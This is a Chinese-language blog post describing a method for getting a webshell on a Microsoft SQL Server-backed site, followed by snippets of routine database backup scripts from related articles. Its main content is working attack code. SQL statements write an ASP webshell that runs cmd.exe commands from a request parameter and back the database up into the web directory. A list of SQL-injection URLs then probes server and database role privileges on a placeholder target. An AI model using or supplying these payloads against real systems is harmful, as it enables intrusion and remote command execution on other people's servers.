備份SQL資料庫得到shell的方法

2021-04-07 05:49:14 字數 2484 閱讀 7179

動畫種這種備份的方法**於n.e.v.e.r的發明

使用語句為:

use model

create table cmd (str image);

insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');

backup database model to disk='虛擬目錄的實際物理目錄';

這個方法對資料庫角色的許可權要求很低,應當有db_backupoperator許可權就可以了。

附上判斷資料庫許可權的語句:(1-8是伺服器角色許可權,9-18是資料庫角色許可權判斷,具體什麼許可權你找本書看看吧。

語句1:http://www.***xx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('sysadmin'));--

語句2:http://www.***xx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('serveradmin'));--

語句3:http://www.***xx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('setupadmin'));--

語句4:http://www.***xx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('securityadmin'));--

語句5:http://www.***xx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('securityadmin'));--

語句6:http://www.***xx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('diskadmin'));--

語句7:http://www.***xx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('bulkadmin'));--

語句8:http://www.***xx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('bulkadmin'));--

語句9:http://www.***xx.com/down/list.asp?id=1 and 1=(select is_member('db_owner'));--

語句10:http://www.***xx.com/down/list.asp?id=1 and 1=(select is_member('db_accessadmin'));--

語句11:http://www.***xx.com/down/list.asp?id=1 and 1=(select is_member('db_addadmin'));--

語句12:http://www.***xx.com/down/list.asp?id=1 and 1=(select is_member('db_addladmin'));-- 

語句13:http://www.***xx.com/down/list.asp?id=1 and 1=(select is_member('db_securityadmin'));--

語句14:http://www.***xx.com/down/list.asp?id=1 and 1=(select is_member('db_backupoperator'));--

語句15:http://www.***xx.com/down/list.asp?id=1 and 1=(select is_member('db_datareader'));--

語句16:http://www.***xx.com/down/list.asp?id=1 and 1=(select is_member('db_datawriter'));--

語句17:http://www.***xx.com/down/list.asp?id=1 and 1=(select is_member('db_denydatareader'));--

語句18:http://www.***xx.com/down/list.asp?id=1 and 1=(select is_member('db_denydadawriter'));--     

動畫結束語引用n.e.v.e.r的<>中的一段原話:

「本來這也不是什麼大不了的東西,但是我寫了還沒有貼出來的時候,有一天qq上居然有人神神秘秘地把這篇文章傳給了我,隔了不久又有人送了我乙個這方面的工具!我好感動哦,5555555~

我也不追問他們是**得來的了,我給過的就幾個,總是這樣子傳出去的吧。反正大家都知道,也沒有什麼好保留的,於是在黑防四期上騙了點錢,過程就是這樣。」

lcx來說兩句,好像n.e.v.e.r對這事公開很生氣,我再做個動畫,哈哈。。。。

其實asp**寫在exe裡改字尾也是可以執行的。。。。。

SQL資料庫備份

use master go 在硬碟上建立備份裝置 exec sp addumpdevice disk mybackupfile,c mybackupfile.bak 刪除備份裝置 exec sp dropdevice mybackupfile 備份資料庫資料到臨時裝置 backup database...

SHELL 備份Mysql資料庫

這個指令碼雖然比較簡單,但覺得會幫我們很大的忙!簡單說一下 db user user 為使用者名稱 db pass password 為密碼 mkdir home mysqlbak date 指定並建立要備份到的目錄 bin dir usr local mysql bin 指定你的mysql的位置 ...

Shell 備份MySQL資料庫

建立備份指令碼,並且自動刪除十天以前的備份檔案 bin bash 備份資料庫命令 mysqldump hhadoop1 p3306 uroot proot mydb tmp.sql 備份到此目錄 mysqldump dir usr data mysql dump 檢視mysql備份目錄是否存在 if...